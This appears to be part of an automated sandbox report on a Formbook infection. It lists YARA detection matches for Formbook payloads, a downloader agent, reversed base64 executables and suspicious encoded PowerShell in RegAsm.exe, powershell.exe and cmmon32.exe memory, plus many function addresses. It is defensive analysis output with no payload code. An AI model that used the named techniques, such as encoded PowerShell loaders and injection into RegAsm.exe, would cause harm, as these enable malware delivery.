Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.powershell.exe.12fe0190000.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 21.2.powershell.exe.28251060000.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 21.2.powershell.exe.282392fdd48.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 21.2.powershell.exe.282396edb80.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 21.2.powershell.exe.282396edb80.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.608771918.000002823988E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.609935000.00000282490C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000015.00000002.605217866.0000028239656000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.503455529.0000012FE0190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.611974071.0000028251060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: powershell.exe PID: 7076, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 7076, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6384, type: MEMORYSTR Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: Process Memory Space: powershell.exe PID: 6384, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6508, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FF9F16F1DF8 6_2_00007FF9F16F1DF8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FF9F16F1D70 6_2_00007FF9F16F1D70
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FF9F16F1988 7_2_00007FF9F16F1988
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FF9F16F0C6B 7_2_00007FF9F16F0C6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00401030 9_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040909B 9_2_0040909B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004090A0 9_2_004090A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00401209 9_2_00401209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00402D88 9_2_00402D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00402D90 9_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041D7DD 9_2_0041D7DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041CFAA 9_2_0041CFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00402FB0 9_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C322AE 9_2_02C322AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9EBB0 9_2_02B9EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2DBD2 9_2_02C2DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C203DA 9_2_02C203DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C32B28 9_2_02C32B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B920A0 9_2_02B920A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7B090 9_2_02B7B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C328EC 9_2_02C328EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C320A8 9_2_02C320A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21002 9_2_02C21002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C3E824 9_2_02C3E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B84120 9_2_02B84120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6F900 9_2_02B6F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C32EF7 9_2_02C32EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B86E30 9_2_02B86E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2D616 9_2_02C2D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C3DFCE 9_2_02C3DFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C31FF1 9_2_02C31FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2D466 9_2_02C2D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7841F 9_2_02B7841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C325DD 9_2_02C325DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B92581 9_2_02B92581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7D5E0 9_2_02B7D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B60D20 9_2_02B60D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C31D55 9_2_02C31D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C32D07 9_2_02C32D07
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FF9F16E0CD0 14_2_00007FF9F16E0CD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FF9F16E0D30 14_2_00007FF9F16E0D30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477841F 23_2_0477841F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0482D466 23_2_0482D466
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04760D20 23_2_04760D20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048325DD 23_2_048325DD
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04832D07 23_2_04832D07
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477D5E0 23_2_0477D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04831D55 23_2_04831D55
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04792581 23_2_04792581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04786E30 23_2_04786E30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04832EF7 23_2_04832EF7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0482D616 23_2_0482D616
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0483DFCE 23_2_0483DFCE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04831FF1 23_2_04831FF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048320A8 23_2_048320A8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478A830 23_2_0478A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048328EC 23_2_048328EC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821002 23_2_04821002
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0483E824 23_2_0483E824
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047920A0 23_2_047920A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477B090 23_2_0477B090
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04784120 23_2_04784120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476F900 23_2_0476F900
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048322AE 23_2_048322AE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0481FA2B 23_2_0481FA2B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478AB40 23_2_0478AB40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0482DBD2 23_2_0482DBD2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048203DA 23_2_048203DA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04832B28 23_2_04832B28
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479EBB0 23_2_0479EBB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_032090A0 23_2_032090A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0320909B 23_2_0320909B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0321CFAA 23_2_0321CFAA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_03202FB0 23_2_03202FB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_03202D88 23_2_03202D88
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_03202D90 23_2_03202D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00401030 24_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0040909B 24_2_0040909B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_004090A0 24_2_004090A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00401209 24_2_00401209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00402D88 24_2_00402D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00402D90 24_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041D7DD 24_2_0041D7DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041CFAA 24_2_0041CFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00402FB0 24_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03192B28 24_2_03192B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030FEBB0 24_2_030FEBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0318DBD2 24_2_0318DBD2
